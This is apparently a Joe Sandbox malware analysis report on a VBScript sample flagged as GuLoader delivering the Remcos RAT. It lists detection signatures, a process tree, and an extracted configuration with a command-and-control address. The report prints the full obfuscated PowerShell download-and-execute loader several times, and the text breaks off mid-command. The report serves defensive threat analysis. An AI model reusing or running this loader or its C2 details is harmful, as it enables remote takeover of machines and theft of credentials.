Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Reqt 83291.vbs

Overview

General Information

Sample name:Reqt 83291.vbs
Analysis ID:1572960
MD5:67552a3cc2641ad2c640148836475c97
SHA1:c35ae8937bbd48525c521fdb33aef88a1399bec0
SHA256:ef0695bdd5f43136be86281b48a318c29b7d18268cca5e1956eff46ee655f858
Tags:GuLoadervbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5772 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reqt 83291.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5Hirs8');Vedligeholdelsesvejledningerne148 ($Hunstiks);Vedligeholdelsesvejledningerne148 (Recheck 'Bnde$HoneU EmipudvapWashiRhestJubiy aignThaleCransGrapsTo c.N,niHModveFe laKontdE,eceUntirChems Mes[ a.l$SuffTSo.aeFiler DenrArbeeBorts OuttUnferSummi UndaC lolT.eti ubs HusmAl,o]Grye=Inde$VikaUDuchdInflh yhrnSprjgGingsStortMezea B.ng');$Strimmellser=Recheck 'Anko$SpreUAlumpTh.npDrapiSupetD mayPla,n Spie erasBilisBeta.PineDKjrso Se w,fginClo,lHereoD.kla Anid N nFSimoiT,phl Seme ask(Prot$UnchF OdioCatar J ne Attw UnsiHomonHu,hgovers Spo1V,lg3Exhi8Bes ,Avis$ P ts CaliPejenJenfdIgrabDiffiTredlHusmlmulteA red expeSelsrKa,dnGurseBugvsStav)';$sindbilledernes=$Melanthy;Vedligeholdelsesvejledningerne148 (Recheck 'Sp c$lyk GScalLr,aboBr.ab S iARickLEneb: .esOUncavE ecE NicRBegrp PaluShe B astL phaiReceCDo.m= Pla( ,estserieAfkaSWhizTSpec-UmleP C raDecaTexplh,jer Forl$HappsUncoi Sern.ypaDSoftBMiliiSautlA guLL moe A,tDA bnePerpRFastnLgtre anks Hul)');while (!$Overpublic) {Vedligeholdelsesvejledningerne148 (Recheck ' Saf$ anngSceplPnseo,letbCorta mpelD gl:Par RS,ksa datt esisahaobezen NoneZimmduds = dag$ utdp ndlRepraUnshgI miiEnsta RugrCanjiDattzSejpe dens') ;Vedligeholdelsesvejledningerne148 $Strimmellser;Vedligeholdelsesvejledningerne148 (Recheck ' C,msStu TSundAProsR mbet L m-EleksBragLbu lE T lEcoelPKbes Un o4');Vedligeholdelsesvejledningerne148 (Recheck 'Mole$ .ooGTun l mmeOHen.b IblANonrlunsh: FaloFeltVJetje ebr SkrpskoluImpubBanklpolyIGennCFist=rasp(PuncTRjseE anoSPlotTOper-S,depBnkeA BilTUdvihCaus Aftv$Jgers.uppiP laNin ed A rb D tiBl klYe,tlCur,eS ipdPolyeSlagRSkr nKoblEAfskSAlab)') ;Vedligeholdelsesvejledningerne148 (Recheck 'Sult$UnfrgT ndlUndeO.ncoBF ckAFosfLHema:Histn Ko oWhacNDattDFre,e ForC ColIPoi S SubITeksoVoluNTali=An.o$DelvGDigtlCrypOPneuBDa aa BoplSkol:Ca.mOpreeVDatoeNoncr GalsT toeEnthEUrogDCifrE BluDCa v+Spin+Padl%Trip$skrkAThe,F Na,b KilA FilLOpskaTowankulscFo lSGebynSnftr,all. Ls cUvanODegruAndrNForrT') ;$Forewings138=$Afbalancsnr[$Nondecision]}$Yverformer=279198;$Befordringsfradragene=31971;Vedligeholdelsesvejledningerne148 (Recheck 'Doll$H llgFo slUe.soAntibLeveAIcemlMart: UnhsBranP EnohJrenATylveAfr r ManOEnglsL vso AktMFoodeUtmm par= ut. s rG ArcEA owT D a-StniC,nluOVentNCordTStraE eawN LedTBeet Sara$KurssMut,iStepnScenD,locbStueiPharL r.fL KlaE.ongd Ob eStikr,remnGui,e nds');Vedligeholdelsesvejledningerne148 (Recheck 'Be,n$L.segBasilMe.eoSlamb Da aIatrlChl : B eAAggrt.ebet,nfrrTapeaEuphc Outt C eaSilkbT ielForbebal. Bril=sche depe[SpolSCummyBvresRo ptOv reSkr mInd .Ca,eC ox.o aspnSikkvm njeMiddrInddtEfte] Non:Min :T riFCordrTheroKoramSkarB D sa VolsAsc eCi,r6Unde4sideSKjrst DgnrDiagiVin.nI nigM.lm(Gyps$Tr,csEl cp OuthIncoaSarue TrarUnreoOversTireoalfam De eUnco)');Vedligeholdelsesvejledningerne148 (Recheck 'Outr$ kakg ErkL SoeO areb tedASkumL Acr:Luksc el.ODottlLovlOSpo,T ParoSystMKalmy age T ta=Ensi Poki[Creds dfy RetsLys tovareSelemInpu.StryTFriheliquXImprTG,at. SetESandnud.lc MedOGldeD,tevIcofoNQuotgSham] Irr: Fd :TaloaZ ofS,ovecThu,ITreaI Ket.PenigEft EKloktSh rSUnmitVlteRIntuIFo pnLut gBruj(Subp$Gu nAWedgt DisT Pl rOutfaEmpaCVindTValiaSol.bSudalGonaehaab)');Vedligeholdelsesvejledningerne148 (Recheck 'Co,f$ BomGAmbrL,ikvOAng bStanaAu oL Ol,:Un.aUForfDFuglbAw,klPalasGartEvarmRAuto=Band$FritcMa so BorlOst oB rgTGruno egem Un YVrks.HexasFiumuBewhBAndesOp etS,hlrLiegiJettNModeGUnta(He.d$UncoY Ex VK,viEJuggREftefPhotoverdRTrneM ButEPal,r C,n,Sk l$ vivBDiskeCib fcunnOnonarM.tzdinfaRTinsIDi,kn ilegHi asJo fFDecarGer AIndiD uglRMillA OveGHalveDiscn atEH,ve)');Vedligeholdelsesvejledningerne148 $Udblser;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 5692 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5Hirs8');Vedligeholdelsesvejledningerne148 ($Hunstiks);Vedligeholdelsesvejledningerne148 (Recheck 'Bnde$HoneU EmipudvapWashiRhestJubiy aignThaleCransGrapsTo c.N,niHModveFe laKontdE,eceUntirChems Mes[ a.l$SuffTSo.aeFiler DenrArbeeBorts OuttUnferSummi UndaC lolT.eti ubs HusmAl,o]Grye=Inde$VikaUDuchdInflh yhrnSprjgGingsStortMezea B.ng');$Strimmellser=Recheck 'Anko$SpreUAlumpTh.npDrapiSupetD mayPla,n Spie erasBilisBeta.PineDKjrso Se w,fginClo,lHereoD.kla Anid N nFSimoiT,phl Seme ask(Prot$UnchF OdioCatar J ne Attw UnsiHomonHu,hgovers Spo1V,lg3Exhi8Bes ,Avis$ P ts CaliPejenJenfdIgrabDiffiTredlHusmlmulteA red expeSelsrKa,dnGurseBugvsStav)';$sindbilledernes=$Melanthy;Vedligeholdelsesvejledningerne148 (Recheck 'Sp c$lyk GScalLr,aboBr.ab S iARickLEneb: .esOUncavE ecE NicRBegrp PaluShe B astL phaiReceCDo.m= Pla( ,estserieAfkaSWhizTSpec-UmleP C raDecaTexplh,jer Forl$HappsUncoi Sern.ypaDSoftBMiliiSautlA guLL moe A,tDA bnePerpRFastnLgtre anks Hul)');while (!$Overpublic) {Vedligeholdelsesvejledningerne148 (Recheck ' Saf$ anngSceplPnseo,letbCorta mpelD gl:Par RS,ksa datt esisahaobezen NoneZimmduds = dag$ utdp ndlRepraUnshgI miiEnsta RugrCanjiDattzSejpe dens') ;Vedligeholdelsesvejledningerne148 $Strimmellser;Vedligeholdelsesvejledningerne148 (Recheck ' C,msStu TSundAProsR mbet L m-EleksBragLbu lE T lEcoelPKbes Un o4');Vedligeholdelsesvejledningerne148 (Recheck 'Mole$ .ooGTun l mmeOHen.b IblANonrlunsh: FaloFeltVJetje ebr SkrpskoluImpubBanklpolyIGennCFist=rasp(PuncTRjseE anoSPlotTOper-S,depBnkeA BilTUdvihCaus Aftv$Jgers.uppiP laNin ed A rb D tiBl klYe,tlCur,eS ipdPolyeSlagRSkr nKoblEAfskSAlab)') ;Vedligeholdelsesvejledningerne148 (Recheck 'Sult$UnfrgT ndlUndeO.ncoBF ckAFosfLHema:Histn Ko oWhacNDattDFre,e ForC ColIPoi S SubITeksoVoluNTali=An.o$DelvGDigtlCrypOPneuBDa aa BoplSkol:Ca.mOpreeVDatoeNoncr GalsT toeEnthEUrogDCifrE BluDCa v+Spin+Padl%Trip$skrkAThe,F Na,b KilA FilLOpskaTowankulscFo lSGebynSnftr,all. Ls cUvanODegruAndrNForrT') ;$Forewings138=$Afbalancsnr[$Nondecision]}$Yverformer=279198;$Befordringsfradragene=31971;Vedligeholdelsesvejledningerne148 (Recheck 'Doll$H llgFo slUe.soAntibLeveAIcemlMart: UnhsBranP EnohJrenATylveAfr r ManOEnglsL vso AktMFoodeUtmm par= ut. s rG ArcEA owT D a-StniC,nluOVentNCordTStraE eawN LedTBeet Sara$KurssMut,iStepnScenD,locbStueiPharL r.fL KlaE.ongd Ob eStikr,remnGui,e nds');Vedligeholdelsesvejledningerne148 (Recheck 'Be,n$L.segBasilMe.eoSlamb Da aIatrlChl : B eAAggrt.ebet,nfrrTapeaEuphc Outt C eaSilkbT ielForbebal. Bril=sche depe[SpolSCummyBvresRo ptOv reSkr mInd .Ca,eC ox.o aspnSikkvm njeMiddrInddtEfte] Non:Min :T riFCordrTheroKoramSkarB D sa VolsAsc eCi,r6Unde4sideSKjrst DgnrDiagiVin.nI nigM.lm(Gyps$Tr,csEl cp OuthIncoaSarue TrarUnreoOversTireoalfam De eUnco)');Vedligeholdelsesvejledningerne148 (Recheck 'Outr$ kakg ErkL SoeO areb tedASkumL Acr:Luksc el.ODottlLovlOSpo,T ParoSystMKalmy age T ta=Ensi Poki[Creds dfy RetsLys tovareSelemInpu.StryTFriheliquXImprTG,at. SetESandnud.lc MedOGldeD,tevIcofoNQuotgSham] Irr: Fd :TaloaZ ofS,ovecThu,ITreaI Ket.PenigEft EKloktSh rSUnmitVlteRIntuIFo pnLut gBruj(Subp$Gu nAWedgt DisT Pl rOutfaEmpaCVindTValiaSol.bSudalGonaehaab)');Vedligeholdelsesvejledningerne148 (Recheck 'Co,f$ BomGAmbrL,ikvOAng bStanaAu oL Ol,:Un.aUForfDFuglbAw,klPalasGartEvarmRAuto=Band$FritcMa so BorlOst oB rgTGruno egem Un YVrks.HexasFiumuBewhBAndesOp etS,hlrLiegiJettNModeGUnta(He.d$UncoY Ex VK,viEJuggREftefPhotoverdRTrneM ButEPal,r C,n,Sk l$ vivBDiskeCib fcunnOnonarM.tzdinfaRTinsIDi,kn ilegHi asJo fFDecarGer AIndiD uglRMillA OveGHalveDiscn atEH,ve)');Vedligeholdelsesvejledningerne148 $Udblser;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 3660 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6776 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\lahohqpsrcskvvhwhdioicctkhlgz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5564 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vcmhhjaufkkpxkvaqovqlgwctnupsinbp" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1996 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xwrzi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["154.216.18.62:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-D98D6X", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.3317622787.0000000008009000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000007.00000003.2558622157.0000000008020000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.3317756831.0000000008027000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000003.2616346771.0000000008026000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000004.00000002.2426474677.0000000008790000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 13 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_4088.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_5692.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc5a6:$b2: ::FromBase64String(
              • 0xb61f:$s1: -join
              • 0x4dcb:$s4: +=
              • 0x4e8d:$s4: +=
              • 0x90b4:$s4: +=
              • 0xb1d1:$s4: +=
              • 0xb4bb:$s4: +=
              • 0xb601:$s4: +=
              • 0x15c60:$s4: +=
              • 0x15ce0:$s4: +=
              • 0x15da6:$s4: +=
              • 0x15e26:$s4: +=
              • 0x15ffc:$s4: +=
              • 0x16080:$s4: +=
              • 0xbe45:$e4: Get-WmiObject
              • 0xc034:$e4: Get-Process
              • 0xc08c:$e4: Start-Process
              • 0x168e3:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reqt 83291.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reqt 83291.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reqt 83291.vbs", ProcessId: 5772, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.86.72, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3660, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49761
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe 